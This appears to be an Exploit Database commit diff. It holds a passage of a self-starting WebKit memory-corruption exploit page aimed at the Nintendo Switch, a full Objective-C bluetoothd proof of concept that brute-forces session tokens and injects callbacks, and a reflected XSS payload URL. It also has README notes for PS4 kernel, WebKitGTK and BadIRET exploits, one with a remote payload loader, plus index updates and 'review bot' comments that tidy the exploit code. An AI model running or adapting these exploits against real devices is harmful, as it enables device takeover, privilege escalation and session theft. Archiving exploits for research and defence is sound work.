// Found the value! bufs[i][k] point now at the same memory as stale[0]
if (bufs[i][k] == 0x41414242) {
alert(\'Overlapping Arrays found at bufs[\'+i+\'][\'+k+\']\\nsmash.length is still: 0x\'+smash.length.toString(16));
// create a new object. Will look kinda like this:
// 0x0100150000000136 0x0000000000000000 <- fictional value
// 0x0000000000000064 0x0000000000000000 <- [\'a\'],[\'b\']
// 0x???????????????? 0x0000000000000100 <- [\'c\'],[\'d\']
stale[0] = {
\'a\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
\'b\': u2d(0, 0),
\'c\': smash, // var pointing at the struct of a Uint32Array(0x10)
\'d\': u2d(0x100, 0)
}
alert(\'created the JSObject.\\nstale[0] = \'+stale[0]);
// remember the original stale pointer, pointing at the object with the a,b,c,d properties
stale[1] = stale[0];
// now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
bufs[i][k] += 0x10;
// check the type of stale[0].
// removed the loop because it makes the exploit sooooooo unreliable
// based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
/*while(!(stale[0] instanceof Uint32Array)) {
// if stale[0] is not a Uint32Array yet, increment the structureID guess
structureID++;
// assign the next structureID to the original object still referenced by stale[1]
stale[1][\'a\'] = u2d(structureID, 0);
}*/
// Give some information. stale[0] should now be a Uint32Array
alert(\'misaligned the pointer to the JSObject.\\nstale[0] = \'+stale[0]+\'\');
// write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
// which should point to the struct of smash, allowing us to overwrite the length of smash
stale[0][6] = 0x1337;
// check the length of smash is now.
alert(\'smash.length is now: 0x\'+smash.length.toString(16));
alert(\'done!\\nswitch will probably crash now :O\');
return;
}
}
}
}
document.getElementById(\'status\').innerText = \' fail. refresh the page and try again...\';
setTimeout(function() {document.location.reload();}, 1000);
}
function go() {
document.getElementById(\'status\').innerText = \' go! \';
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
setTimeout(go_, 500);
}
// if Switch browser is detected, auto start exploit
if(navigator.userAgent.indexOf(\'Nintendo Switch\')>-1) {
document.getElementById(\'status\').innerText = \'Found Nintendo Switch! \';
setTimeout(go, 2000);
}
</script>
</body>
</html>
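Review bot: `dgc`, `i` and `k` are implicit globals — `dgc = function() {` has no `var`, and the loops `for (i = 0; i < bufs.length; i++)` and `for (k = 0; k < bufs[i].length;)` inside `not_number.toString`, plus the search loops in `go_`, omit the declaration, so they would throw under `'use strict'` and silently share state between the two functions; declare them (`var dgc = function() {`, `for (var i = 0; ...)`, `for (var k = 0; ...)`). The line `bufs[i] = new Uint32Array(0x100 * 2)` is missing its semicolon. The search loop bounds `k` by `bufs[0].length` while indexing `bufs[i]`; every entry is allocated with the same size so it is harmless today, but `bufs[i].length` states what is meant. The `\'` sequences throughout look like a rendering artefact of this page rather than literal backslashes in the file; if they are literal, `href=\'javascript:go();\'` is not valid attribute quoting and should be checked in the stored file.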


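--- a/exploits/hardware/remote/44196.md
+++ b/exploits/hardware/remote/44196.md
@@ -0,0 +1,26 @@
+# PS4 4.55 Kernel Exploit
+---
+## Summary
+In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
+This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/455/).
+## Patches Included
+The following patches are made by default in the kernel ROP chain:
+1) Disable kernel write protection
+2) Allow RWX (read-write-execute) memory mapping
+3) Syscall instruction allowed anywhere
+4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
+5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
+## Notes
+- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
+## Contributors
+Massive credits to the following:
+- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
+- [Flatz](https://twitter.com/flat_z)
+- Anonymous
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip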

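--- a/exploits/linux/local/44204.md
+++ b/exploits/linux/local/44204.md
@@ -0,0 +1,44 @@
+# CVE-2014-1303 PoC for Linux
+CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux.
+This repository demonstrates the WebKit heap based buffer overflow vulnerability (CVE-2014-1303) on **Linux**.
+**NOTE:** Original exploit is written for Mac OS X and PS4 (PlayStation4).
+I've ported and tested work on Ubuntu 14.04, [WebKitGTK 2.1.2](https://webkitgtk.org/releases/)
+## Usage
+Firstly you need to run simple web server,
+```
+$ python server.py
+```
+then
+```
+$ cd /path/to/webkitgtk2.1.2/
+$ ./Programs/GtkLauncher http://localhost
+```
+You can run several tests like,
+- Crash ROP (Jump to invalid address like 0xdeadbeefdeadbeef)
+- Get PID (Get current PID)
+- Code Execution (Load and execute payload from outer network)
+- File System Dump (Dump "/dev" entries)
+## Description
+**exploit.html** ..... trigger vulnerability and jump to ROP chain
+**scripts/roputil.js** ..... utilities for ROP building
+**scripts/syscall.js** ..... syscall ROP chains
+**scripts/code.js** ..... hard coded remote loader
+**loader/** ..... simple remote loader (written in C)
+**loader/bin2js** ..... convert binary to js variables (for loader)
+## Purpose
+I've created this WebKit PoC for education in my course.
+I couldn't, of course, use actual PS4 console in my lecture for legal reason :(
+## Reference
+CVE 2014-1303 Proof Of Concept for PS4
+(https://github.com/Fire30/PS4-2014-1303-POC)
+Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14]
+(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44204.zip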

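--- a/exploits/linux/local/44205.md
+++ b/exploits/linux/local/44205.md
@@ -0,0 +1,16 @@
+# CVE-2014-9322 PoC for Linux kernel
+CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux kernel.
+This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls.
+[Raw Linux Threads via System Calls](http://nullprogram.com/blog/2015/05/15/)
+# Usage
+```
+$ make
+```
+**badiret.elf** is an ELF executable.
+**badiret.bin** is a raw binary that can be used as payload.
+# Reference
+[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)
+Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip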

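--- a/exploits/multiple/dos/44215.m
+++ b/exploits/multiple/dos/44215.m
@@ -0,0 +1,222 @@
+//
+// main.m
+// bluetoothdPoC
+//
+// Created by Rani Idan.
+// Copyright © 2018 zLabs. All rights reserved.
+//
+#import "AppDelegate.h"
+#include <mach/mach.h>
+extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
+/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
+#define CALLBACK_ADDRESS 0xdeadbeef
+#define CALLBACK_ADDITIONAL_DATA 0x13371337
+#define BLUETOOTHD_CONST 0xFA300
+#define BLUETOOTHD_WRONG_TOKEN 7
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
+#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
+#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
+#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
+#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
+typedef unsigned int mach_msg_return_value;
+mach_port_t get_service_port(char *service_name)
+{
+kern_return_t ret = KERN_SUCCESS;
+mach_port_t service_port = MACH_PORT_NULL;
+mach_port_t bs = MACH_PORT_NULL;
+ret = task_get_bootstrap_port(mach_task_self(), &bs);
+ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
+if (ret)
+{
+NSLog(@"Couldn't find port for %s",service_name);
+return MACH_PORT_NULL;
+}
+NSLog(@"Got port: %x", service_port);
+mach_port_deallocate(mach_task_self(), bs);
+return service_port;
+}
+mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
+{
+mach_port_t receive_port = MACH_PORT_NULL;
+mach_msg_header_t * message = NULL;
+char *data = NULL;
+kern_return_t ret = KERN_SUCCESS;
+mach_msg_return_value return_value = 0;
+mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
+mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
+mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
+mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
+mach_msg_size_t msg_size = MAX(recv_size, send_size);
+ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
+if ( ret != KERN_SUCCESS)
+{
+return_value = -3;
+NSLog(@"Failed to allocate port ret=%x", ret);
+NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+goto cleanup;
+}
+ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
+if ( ret != KERN_SUCCESS)
+{
+return_value = -3;
+NSLog(@"Failed to insert port right ret=%x", ret);
+NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+goto cleanup;
+}
+message = malloc(msg_size);
+data = (char *)message;
+memset(message, 0, msg_size);
+*((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
+*((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
+*((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
+message->msgh_bits = 0x1513 ;
+message->msgh_remote_port = bluetoothd_port; /* Request port */
+message->msgh_local_port = receive_port; /* Reply port */
+message->msgh_size = send_size; /* Message size */
+message->msgh_reserved = 0;
+message->msgh_id = BLUETOOTHD_CONST + msgh_id;
+ret = mach_msg(message, /* The header */
+options, /* Flags */
+send_size, /* Send size */
+recv_size, /* Max receive Size */
+receive_port, /* Receive port */
+BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
+MACH_PORT_NULL); /* No notification */
+if(MACH_MSG_SUCCESS == ret)
+{
+return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
+if (return_value != BLUETOOTHD_WRONG_TOKEN) {
+NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
+}
+} else if (MACH_RCV_INVALID_NAME == ret)
+{
+NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+NSLog(@"mach_error_int: ret=%x", ret);
+NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+return_value = -2;
+}
+else {
+NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
+NSLog(@"mach_error_int: ret=%x", ret);
+NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
+return_value = -1;
+}
+cleanup:
+if(MACH_PORT_NULL != receive_port)
+{
+mach_port_destroy(mach_task_self(), receive_port);
+}
+if (NULL != message) {
+free(message);
+}
+return return_value;
+}
+void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
+{
+int ports_found[0xffff] = {0};
+int number_of_ports_found = 0;
+mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
+if (MACH_PORT_NULL == bluetoothd_port)
+{
+NSLog(@"Couldn't have bluetoothd port");
+return;
+}
+NSLog(@"Starting to look for session tokens");
+for (int i = 0; i <= 0xffff; i++) {
+int id = 0;
+id = (i << 16) + 1;
+int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+{
+NSLog(@"Found port: %x", id);
+ports_found[number_of_ports_found] = id;
+number_of_ports_found ++;
+}
+id = (i << 16) + 2;
+result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+{
+NSLog(@"Found port: %x", id);
+ports_found[number_of_ports_found] = id;
+number_of_ports_found ++;
+}
+id = (i << 16);
+result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
+if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
+{
+NSLog(@"Found port: %x", id);
+ports_found[number_of_ports_found] = id;
+number_of_ports_found ++;
+}
+}
+for (int i = number_of_ports_found-1; i>=0; i--) {
+NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
+BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
+}
+NSLog(@"Done");
+return;
+}
+void trigger() {
+try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
+}
+int main(int argc, char * argv[]) {
+trigger();
+}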
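Review bot: The three `if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)` checks in try_to_add_callback_BTLocalDeviceAddCallbacks let the -2 and -3 failure codes that BTLocalDevice_add_callback returns on transport or port-setup errors pass as hits, and `ports_found[number_of_ports_found]` is written with no bound although the loop runs 0x10000 iterations with three candidates each against a 0xffff-element array; each check should read `if (result_code >= 0 && result_code != BLUETOOTHD_WRONG_TOKEN && number_of_ports_found < (int)(sizeof ports_found / sizeof ports_found[0]))`. The negative sentinels only work through implicit conversion, because mach_msg_return_value is `unsigned int` while the caller stores the result in an `int`; a signed return type would make that contract explicit. In get_service_port the result of `task_get_bootstrap_port` is overwritten unchecked and the `bs` it fills is never used for the lookup, which goes through the global `bootstrap_port`, so either pass `bs` to bootstrap_look_up or drop the call and the matching deallocate. `message = malloc(msg_size);` is also unchecked before the memset, and `%x` with `(unsigned int)address` truncates a pointer on 64-bit builds where `%p` is the portable form.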

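--- a/exploits/perl/webapps/44216.txt
+++ b/exploits/perl/webapps/44216.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting
+# Date: 18-01-18
+# Vendor Homepage: http://www.steveshipway.org/software/
+# Software Link: https://github.com/sshipway/routers2
+# Version: 2.24
+# CVE: CVE-2018-6193
+# Platform: Perl
+# Category: webapps
+# Exploit Author: Lorenzo Di Fuccia
+# Contact: lorenzo.difuccia@gmail.com
+# Website: https://github.com/lorenzodifuccia
+1. Description
+Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`.
+2. Proof of Concept
+http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers
+3. Solution
+Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`.
+4. References
+https://github.com/sshipway/routers2/issues/1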

@ -5878,6 +5878,10 @@ id,file,description,date,author,type,platform,port
44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -7032,7 +7036,7 @@ id,file,description,date,author,type,platform,port
14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@ -7054,7 +7058,7 @@ id,file,description,date,author,type,platform,port
14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",local,hardware,
14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@ -8489,7 +8493,7 @@ id,file,description,date,author,type,platform,port
25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,local,solaris,
25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",local,linux,
25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",local,linux,
25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,local,windows,
40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",local,linux,
25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",local,linux,
@ -9330,7 +9334,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@ -9543,7 +9547,14 @@ id,file,description,date,author,type,platform,port
44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
44177,exploits/bsd/local/44177.c,"Sony Playstation 4 4.55 FW - Local Kernel",2018-02-26,qwertyoruiop,local,bsd,
44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10355,7 +10366,7 @@ id,file,description,date,author,type,platform,port
4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",remote,hardware,
4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@ -16265,6 +16276,7 @@ id,file,description,date,author,type,platform,port
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38121,7 +38133,7 @@ id,file,description,date,author,type,platform,port
44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - SQL Injection",2018-02-16,"Shayan S",webapps,asp,443
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443
44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80
44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80
44102,exploits/php/webapps/44102.txt,"Twig < 2.4.4 - Server Side Template Injection",2018-02-16,JameelNabbo,webapps,php,80
@ -38924,3 +38936,4 @@ id,file,description,date,author,type,platform,port
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
